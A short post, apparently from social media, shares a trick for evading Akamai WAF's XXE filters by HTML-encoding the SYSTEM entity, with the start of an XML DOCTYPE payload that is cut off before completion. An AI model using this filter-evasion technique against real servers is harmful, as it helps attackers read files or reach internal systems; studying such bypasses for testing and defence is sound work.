You can bypass Akamai WAF’s XXE filters by HTML encoding the SYSTEM entity within a payload like this:

<!DOCTYPE foo [<!ENTITY % a “&#x3c;&#x21; … omitted …

neat trick! used this today.

Credits: @infosec_au